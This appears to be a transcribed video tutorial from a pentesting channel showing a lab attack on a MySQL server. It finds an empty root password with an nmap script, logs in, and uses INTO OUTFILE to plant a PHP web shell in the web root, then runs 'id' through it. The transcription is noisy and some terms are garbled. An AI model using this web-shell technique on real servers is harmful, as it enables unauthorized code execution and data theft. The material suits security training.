Hello guys, welcome back to Pentesters Club. Today we are going to discuss about remote code execution in MySQL. So we call it also as a REC in MySQL. So it refers as a security vulnerabilities where an attacker can execute an arbitrary code on a MySQL server from the remote location, typically without a proper authorization, such as vulnerabilities are considered a critical and can have a server consequences and potentially leading an unauthorized access and data breaches. So for this, how we can prevent this one? So we keep MySQL updated, strong authentication, access control, firewall, secure input validation, latest privilege principles, security audit, encryption, monitoring and logging, vendor and community resource. So we go further to make a lab this one. So first of all, we just open a terminal. So just make it big. So I can type IP address, sorry, just type clear IP address. So this is our IP address. So we need to identify the same thing, nmap 192.2.173.3. Now let's see. Oh, sorry, because this is a 9. I didn't recognize clearly. So we need to type IP address. So again, nmap 192.9.173.3. So here is the same thing. HTTP is available. So for this, we need to open a browser. So you need to type 192.9.193. No, 173.3. So here we got welcome to Adive. Get started. So what we need to do here? So we have already access with port 8080. So here we we know how here this is a vaporizer. So this is a vaporizer. Then click on the PHP. So the web application is based on PHP. So now come back to here. We need to type a list minus here user share nmap scripts grep MySQL. So we can see here MySQL. We see here MySQL empty passwords.msc. So a script is available to check MySQL services is configured without a passwords or not. So we go for with the next command. So for this you need to type nmap script. So you just need to copy here MySQL empty password, then paste it here. Port is 3306 and targeted IP address 192.9.173.3. So that's it. So now you can see nmap scan report for target 1, host is up, and MySQL empty password, a root account has empty password, so that's the MAC address. So login into now MySQL as a root does not have any passwords. Now we need to log in into MySQL server. So for this you need to type MySQL minus u defines a username is a root minus h defines host 192.9.173.3. So we are already in the MySQL server. So now we will write any type of query. So we type select hello. So we go with big hello world to out file. We go with temp from MySQL dot user limit 1. So you can type so query okay, one row is affected and with the seconds. So since a file can be created, it means that MySQL services can be write an arbitrary directories also and provided a directory in the world writable. So we try with now one of the PHP output. Okay, so here we can type select PHP output shell exec sorry get cmd echo need to try this command 3 output into out file www dot sorry html shell.php from MySQL dot user limit 1. So you have error in the SQL syntax. So let's see what is the error. So SELECT, select or get CMD echo. $output. So I think here into out file www.html shell.php from MySQL user. So let's see this. We go with the shell.php. Let's go cmd equal to id. So here the command need to execute. This is not gonna work out. Select php shell exec get cmd echo. So this is, so we can type select php, you can put php, then make a dollars with output equal to shell underscore exe c dollars get. So we have made a mistake in the cmds here. That's the mistake only here. This is only the mistake. Okay, in the cmd we fail to give a double quotes. So now you can see SQL user limit 1 query 1 row is executed. So now you can go here shell.php command.id. So you can see here user id 33 www.data get id 33. So we got executed already here. So this is how you can perform a remote code execution via MySQL. That's it guys. Try it your own guys. Thank you guys for watching. Have a nice day.